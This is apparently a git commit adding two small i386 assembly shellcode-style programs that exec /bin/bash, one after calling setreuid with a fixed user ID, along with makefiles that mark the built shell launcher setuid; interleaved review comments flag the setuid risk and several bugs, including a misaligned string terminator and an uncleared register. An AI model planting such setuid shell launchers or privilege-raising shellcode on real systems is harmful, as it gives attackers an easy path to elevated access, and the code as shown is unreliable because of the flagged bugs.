commit 0c7b4ed75157aa9d781e4eec92a0a604c4c45c9c
Author: Brett Weiland <techcrazybsw@gmail.com>
Date:   Fri Nov 20 17:57:20 2020 -0600

            new file:   exec_cmd/makefile
            new file:   exec_cmd/shell
            new file:   exec_cmd/shell.asm
            new file:   exec_cmd/shell.o
            new file:   exec_cmd_setuid/makefile
            new file:   exec_cmd_setuid/shell
            new file:   exec_cmd_setuid/shell.asm
            new file:   exec_cmd_setuid/shell.o

diff --git a/exec_cmd/makefile b/exec_cmd/makefile
new file mode 100644
index 0000000..676ee34
--- /dev/null
+++ b/exec_cmd/makefile
@@ -0,0 +1,5 @@
+make:
+	nasm shell.asm -felf32 -o shell.o
+	ld -m elf_i386 shell.o -o shell -s
+	chmod u+s shell
+
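Review bot: `chmod u+s shell` on the last recipe line marks the output set-user-ID, and the output is a program whose only job is to start `/bin/bash`; if the build is ever run as root or another privileged account, that leaves a privileged shell launcher on disk. The identical recipe is added in exec_cmd_setuid/makefile. I would take the chmod out of the default target and put it behind an explicit target with a comment such as `# lab VM only: leaves a setuid binary in the tree`, and add a `clean` target that removes `shell` and `shell.o`. The target is also named `make` and is not declared phony; `all` with `.PHONY: all clean` is the usual form. The built `shell` and `shell.o` are tracked in this same commit and would be better ignored than committed.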
diff --git a/exec_cmd/shell b/exec_cmd/shell
new file mode 100755
index 0000000..9ea0d3b
Binary files /dev/null and b/exec_cmd/shell differ
diff --git a/exec_cmd/shell.asm b/exec_cmd/shell.asm
new file mode 100644
index 0000000..d90d9a4
--- /dev/null
+++ b/exec_cmd/shell.asm
@@ -0,0 +1,19 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, edx
+xor edx, edx
+int 0x80
+
+
+data:
+call exploit 
+cmd: db '/bin/bash'
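Review bot: The store `mov [edx + 10], eax` does not line up with the data it is meant to terminate: `cmd` is 9 bytes (offsets 0–8), so the zero lands at offsets 10–13, offset 9 is never written, and the bytes that are written lie past anything the file defines. With the plain `ld` invocation in the makefile, the code and `cmd` presumably end up in a non-writable text segment, so the store would fault before the syscall is reached. For a standalone test binary it is simpler to declare the terminator in the data, `cmd: db '/bin/bash', 0`, and remove the store. The file has no comments at all; a header such as `; i386 Linux, int 0x80: eax=11 (execve), ebx=path, ecx=argv, edx=envp` and a named constant for `11` would make the register setup reviewable. The same store and unterminated string appear in exec_cmd_setuid/shell.asm.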
diff --git a/exec_cmd/shell.o b/exec_cmd/shell.o
new file mode 100644
index 0000000..50283e1
Binary files /dev/null and b/exec_cmd/shell.o differ
diff --git a/exec_cmd_setuid/makefile b/exec_cmd_setuid/makefile
new file mode 100644
index 0000000..676ee34
--- /dev/null
+++ b/exec_cmd_setuid/makefile
@@ -0,0 +1,5 @@
+make:
+	nasm shell.asm -felf32 -o shell.o
+	ld -m elf_i386 shell.o -o shell -s
+	chmod u+s shell
+
diff --git a/exec_cmd_setuid/shell b/exec_cmd_setuid/shell
new file mode 100755
index 0000000..9a98c4f
Binary files /dev/null and b/exec_cmd_setuid/shell differ
diff --git a/exec_cmd_setuid/shell.asm b/exec_cmd_setuid/shell.asm
new file mode 100644
index 0000000..504685f
--- /dev/null
+++ b/exec_cmd_setuid/shell.asm
@@ -0,0 +1,28 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+
+xor edx, edx
+
+xor eax, eax ; set reuid
+xor ebx, ebx
+xor ecx, ecx
+mov al, 203
+mov bx, 14005 
+mov cx, 14005
+int 0x80
+
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, cmd
+int 0x80
+
+data:
+call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start 
+cmd: db '/bin/bash'
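Review bot: `edx` is cleared at the top of `exploit` but then overwritten by `pop edx` and never cleared again, so at the second `int 0x80` the third argument is the address of the path bytes rather than zero as in exec_cmd/shell.asm; that file's `mov ebx, edx` / `xor edx, edx` sequence looks like what was intended here. `mov ebx, cmd` uses the link-time address instead of the popped one, which makes the `call`/`pop` described in the comment on the `call exploit` line redundant. The result of the first syscall is not checked, so execution continues to the exec whether or not the ID change succeeded. `203` and `14005` should be named constants with a comment saying which syscall and which account they refer to, e.g. `SYS_SETREUID32 equ 203`.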
diff --git a/exec_cmd_setuid/shell.o b/exec_cmd_setuid/shell.o
new file mode 100644
index 0000000..59be327
Binary files /dev/null and b/exec_cmd_setuid/shell.o differ